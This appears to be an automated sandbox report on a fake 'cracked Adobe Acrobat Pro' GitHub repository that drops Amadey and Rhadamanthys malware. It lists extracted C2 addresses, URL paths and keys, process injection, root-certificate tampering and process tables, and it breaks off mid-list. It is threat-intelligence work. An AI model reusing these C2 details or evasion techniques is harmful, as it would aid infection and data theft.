amadey | hxxps://github[.]com/warridge36/Adobe-Acrobat-Pro-Cracked

Analysis

max time kernel
145s
max time network
155s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
30-03-2024 19:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/warridge36/Adobe-Acrobat-Pro-Cracked

Score

10^/10

amadey rhadamanthys stealer trojan

Malware Config

Extracted

Family

amadey

Version

4.19

http://185.196.10.188

http://45.159.189.140

http://89.23.103.42

Attributes

install_dir
b4e248fdbd
install_file
Dctooux.exe
strings_key
01edd7c913096383774168b5aeebc95e
url_paths
/hb9IvshS/index.php

/hb9IvshS2/index.php

/hb9IvshS3/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

plugin17337

description pid process target process

PID 3428 created 2812 3428 plugin17337 sihost.exe

description	pid	process	target process
PID 3428 created 2812	3428	plugin17337	sihost.exe

Executes dropped EXE 10 IoCs

Processes:

Launcher.exeLaunhcer.exeLauncher.exewget.exewinrar.exeplugin17337wget.exewinrar.exe2plugin17719wget.exe

pid	process
5664	Launcher.exe
1844	Launhcer.exe
5364	Launcher.exe
5512	wget.exe
5844	winrar.exe
3428	plugin17337
4624	wget.exe
5200	winrar.exe
5968	2plugin17719
1724	wget.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

Processes:

flow	ioc
61	raw.githubusercontent.com
66	raw.githubusercontent.com
71	raw.githubusercontent.com
1	camo.githubusercontent.com
1	bitbucket.org
9	raw.githubusercontent.com
20	camo.githubusercontent.com
36	bitbucket.org

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

2plugin17719

pid process

5968 2plugin17719
5968 2plugin17719
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

6024 3428 WerFault.exe plugin17337
5476 5724 WerFault.exe 3plugin8790

pid	process
5968	2plugin17719
5968	2plugin17719

pid	pid_target	process	target process
6024	3428	WerFault.exe	plugin17337
5476	5724	WerFault.exe	3plugin8790

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings msedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings	msedge.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

Launcher.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe

NTFS ADS 1 IoCs

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\Adobe_Acrobat_Pro.zip:Zone.Identifier msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Adobe_Acrobat_Pro.zip:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exepowershell.exepowershell.exemsedge.exeplugin17337dialer.exe2plugin17719

pid	process
4444	msedge.exe
4444	msedge.exe
3508	msedge.exe
3508	msedge.exe
2956	identity_helper.exe
2956	identity_helper.exe
2388	msedge.exe
2388	msedge.exe
1940	msedge.exe
1940	msedge.exe
3848	powershell.exe
3848	powershell.exe
3848	powershell.exe
5188	powershell.exe
5188	powershell.exe
5188	powershell.exe
5592	msedge.exe
5592	msedge.exe
5592	msedge.exe
5592	msedge.exe
3428	plugin17337
3428	plugin17337
2320	dialer.exe
2320	dialer.exe
2320	dialer.exe
2320	dialer.exe
5968	2plugin17719
5968	2plugin17719

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

Processes:

msedge.exe

pid process

3508 msedge.exe
3508 msedge.exe
3508 msedge.exe
3508 msedge.exe
3508 msedge.exe
3508 msedge.exe
3508 msedge.exe
3508 msedge.exe
3508 msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

7zG.exepowershell.exepowershell.exe

description	pid	process
Token: SeRestorePrivilege	3056	7zG.exe
Token: 35	3056	7zG.exe
Token: SeSecurityPrivilege	3056	7zG.exe
Token: SeSecurityPrivilege	3056	7zG.exe
Token: SeDebugPrivilege	3848	powershell.exe
Token: SeDebugPrivilege	5188	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

msedge.exe

pid	process
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe
3508	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

MiniSearchHost.exe

pid process

4960 MiniSearchHost.exe

pid	process
4960	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 3508 wrote to memory of 2832	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2832	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 2540	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4444	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4444	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe
PID 3508 wrote to memory of 4972	3508	msedge.exe	msedge.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2812

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\srchadmin.dll ,
2⤵
PID:3440

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/warridge36/Adobe-Acrobat-Pro-Cracked
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9c9143cb8,0x7ff9c9143cc8,0x7ff9c9143cd8
2⤵
PID:2832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1380,17214079750652185474,12306760982651783513,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1960 /prefetch:2
2⤵
PID:2540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1380,17214079750652185474,12306760982651783513,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1380,17214079750652185474,12306760982651783513,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2552 /prefetch:8
2⤵
PID:4972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1380,17214079750652185474,12306760982651783513,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
2⤵
PID:768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1380,17214079750652185474,12306760982651783513,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
2⤵
PID:2792

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1380,17214079750652185474,12306760982651783513,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1380,17214079750652185474,12306760982651783513,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
2⤵
PID:3208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1380,17214079750652185474,12306760982651783513,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1380,17214079750652185474,12306760982651783513,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
2⤵
PID:652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
